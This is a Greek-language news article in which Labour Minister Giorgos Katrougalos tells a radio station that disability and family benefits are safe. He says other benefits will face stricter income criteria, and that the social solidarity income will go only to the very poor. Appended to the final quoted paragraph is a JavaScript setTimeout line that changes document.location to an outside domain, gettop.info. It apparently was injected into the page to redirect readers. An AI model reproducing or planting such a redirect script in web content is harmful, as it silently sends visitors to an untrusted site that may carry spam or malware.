Κατρούγκαλος: Το κοινωνικό εισόδημα αλληλεγγύης θα το πάρουν oι πάρα πολύ φτωχοί

0
28

 

Ο υπουργός Εργασίας, Γιώργος Κατρούγκαλος δήλωσε ότι τα επιδόματα επανεξετάζονται με αυστηρότερα εισοδηματικά κριτήρια.

Μιλώντας στον ραδιοφωνικό σταθμό Real Fm 97,8 ο κ. Κατρούγκαλος δήλωσε: «Δεν πρόκειται να κοπούν επιδόματα αναπήρων και οικογενειακά επιδόματα. Αυτό για εμάς είναι αδιαπραγμάτευτο».

«Πρέπει να ξαναδούμε μερικά επιδόματα που δίνονται, αν δίνονται με σωστό τρόπο. Όταν μιλάμε για πρόνοια μιλάμε για λεφτά που πρέπει να πηγαίνουν σε φτωχούς ανθρώπους, αν υπάρχουν λοιπόν χρήματα που πηγαίνουν στη μεσαία τάξη δεν είναι αυτός ο σκοπός της πρόνοιας» σημείωσε ο υπουργός Εργασίας.

Ερωτηθείς για το ποια επιδόματα κινδυνεύουν ο κ. Κατρούγκαλος απάντησε ότι «προσπαθούμε να δούμε εισοδηματικά κριτήρια που υπάρχουν. Για παράδειγμα υπάρχει ένα επίδομα, δεν θα πω ποιο είναι, που το εισοδηματικό του κριτήριο είναι 30.000 ευρώ το χρόνο. 30.000 ευρώ το χρόνο οικογενειακό εισόδημα έχουν πια τα ανώτερα μεσαία στρώματα».

«Τα εισοδηματικά κριτήρια δεν σημαίνει ότι θα πάρουμε ως κριτήριο το που θα δίνουμε τα επιδόματα το πολύ χαμηλό επίπεδο που είναι για το ελάχιστο εισόδημα αλληλεγγύης. Το κοινωνικό εισόδημα αλληλεγγύης θα το πάρουν όχι οι φτωχοί αλλά οι πάρα πολύ φτωχοί». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here